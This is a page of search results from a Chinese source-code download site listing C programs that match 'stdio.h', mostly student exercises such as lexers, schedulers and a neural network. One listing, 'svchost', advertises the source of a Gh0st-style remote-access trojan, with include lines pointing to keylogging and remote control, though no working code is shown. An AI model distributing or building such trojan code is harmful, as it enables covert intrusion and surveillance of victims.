CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 其它 搜索资源 - stdio.h

搜索资源列表

  1. BPprog

    0下载:
  2. BP算法最新C源程序, #include\"stdarg.h\" #include\"stdio.h\" #include\"stdlib.h\" #include\"math.h\" #include\"graphics.h\" #include\"conio.h\" #define IN 4 /*输入层的神经元个数*/ #define HID 13 /*隐含层的神经元个数*/ #define MOD 594 /*学习样本个数*/ #define OUT
  3. 所属分类:其它

    • 发布日期:2008-10-13
    • 文件大小:2958
    • 提供者:陈光华
  1. pa

    0下载:
  2. #include \"define.h\" #include <stdio.h> #include <string.h> #include <ctype.h> #include <malloc.h> FILE *fp /*////////////////////////////////////////////////////////////////////////////// This is a pretreat
  3. 所属分类:编译器/词法分析

    • 发布日期:2008-10-13
    • 文件大小:2335
    • 提供者:dddddddd
  1. complication

    0下载:
  2. #include <stdio.h> #define MAX 10-# include
  3. 所属分类:编译器/词法分析

    • 发布日期:2008-10-13
    • 文件大小:2258
    • 提供者:jessica
  1. shortestroute

    0下载:
  2. #include <stdio.h> #include<cstdlib> int W[4] ,R[4] ,C[4] int P[5]={0,3,3,1,1} int Q[5]={2,3,1,1,1}
  3. 所属分类:其它

    • 发布日期:2008-10-13
    • 文件大小:1057
    • 提供者:鹰隼
  1. 9

    0下载:
  2. 操作系统课程设计_进程调度演示源程序 #include \"stdio.h\" #include \"stdlib.h\" #include \"string.h\" typedef struct node { char name[10] /*进程标识符*/ int prio /*进程优先数*/ int round /*进程时间轮转时间片*/ int cputime /*进程占用CPU时间*/ int needtime /*进程到完成
  3. 所属分类:操作系统开发

    • 发布日期:2008-10-13
    • 文件大小:2366
    • 提供者:wjx
  1. canf18xx8.h

    0下载:
  2. 、 先在microchip网站上找到00738.zip,这个包中有 can18xx8.h,can18xx8.c,将其复制到一个你要编写程度的子目录中,例如C:\testcan下,这个时候这个东东是不能直接用的。 2、 下载一个MPLAB 7.10,直接安装(要求直接下载) 3、 再下载一个PICC18 (HI-TECH的),要正版哦(支持正版,买不起的想其它办法吧) 4、在你的头文件上写上如下的样式: #include "stdio.h"
  3. 所属分类:其它

  1. floppy

    0下载:
  2. 了解载windows系统中如何直接使用磁盘的读写功能,所编应用程序能够响应用户指定的读、写磁盘扇区的请求也能提供查看磁盘相关参数的功能。技术的关键是使用了windows提供的API(应用程序接口)来实现所要求的功能。通过本试验,用户可以利用API进行底层的磁盘操作。同时还附Liuux下的设备驱动程序。-#include <windows.h> #include <winioctl.h>//包含了DISK_GEOMETRY等的定义 #include <iost
  3. 所属分类:OS Develop

    • 发布日期:2017-03-29
    • 文件大小:65598
    • 提供者:jjl
  1. lexical_analyzer

    0下载:
  2. C语言词法分析器 by wpc_LK 这是一个简单的词法分析器,不能避免的存在错误请大家指出予以纠正,谢谢! 示例语句 include<stdio.h> int main{ int a=3,b=4,c if((a+b)==7)c=1 else c=0 return 0 } 输入 exit 退出程序。-C language lexical analyzer by wpc_LK This is a simple lexical
  3. 所属分类:Compiler program

    • 发布日期:2017-03-31
    • 文件大小:12068
    • 提供者:wzl
  1. e

    0下载:
  2. 题目:画椭圆ellipse    1.程序分析: 2.程序源代码: #include "stdio.h" #include "graphics.h" #include "conio.h" -题目:画椭圆ellipse    1.程序分析: 2.程序源代码: #include "stdio.h" #include "graphics.h" #include "conio.h"
  3. 所属分类:assembly language

    • 发布日期:2017-04-06
    • 文件大小:1795
    • 提供者:xl
  1. TDDOWNLOAD

    0下载:
  2. #include <stdio.h> #include <math.h> #include <stdlib.h> #include <float.h> unsigned __int64 mulmod(unsigned __int64 a, unsigned __int64 b, unsigned __int64 m) { static const double _2_64 = 18446744073709551616
  3. 所属分类:source in ebook

    • 发布日期:2017-05-27
    • 文件大小:9861602
    • 提供者:hh
  1. triangular

    0下载:
  2. making triangular number with c++ using integer #include<stdio.h> int triangular(int a) main() { int x printf("menghitung triangular bilangan\n") printf("masukkan bilangan x= ") scanf(" d",&x) triangular(x)
  3. 所属分类:Compiler program

    • 发布日期:2017-11-17
    • 文件大小:960038
    • 提供者:thongthong
  1. color

    0下载:
  2. C语言简单上色的库函数 将其复制到 编译程序安装所在位置的“include”文件夹中,即可调用。 如找不到所述位置,直接搜索stdio.h ,和这个文件放在一起就行。 -C language library functions simple color copy it to the installation location of the compiler " include" folder, you can call. If can not find the
  3. 所属分类:source in ebook

    • 发布日期:2017-04-05
    • 文件大小:2601
    • 提供者:陈文
  1. svchost

    0下载:
  2. ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl
  3. 所属分类:source in ebook

    • 发布日期:2017-05-04
    • 文件大小:3891
    • 提供者:段誉
  1. C语言中scanf的使用

    0下载:
  2. 首先需要#include <stdio.h>int scanf( const char *format, ... );scanf()函数是格式化输入函数,它从标准输入设备(键盘) 读取输入的信息。第一个参数format为一个常量字符串,这个字符串中如果包含‘%’符号则使用后续参数进行匹配如:scanf("%d%d", &a, &b);(First, we need #include <stdio.h>int scanf (const c
  3. 所属分类:书籍源码

    • 发布日期:2018-04-29
    • 文件大小:5120
    • 提供者:Bruce Leung
搜珍网 www.dssz.com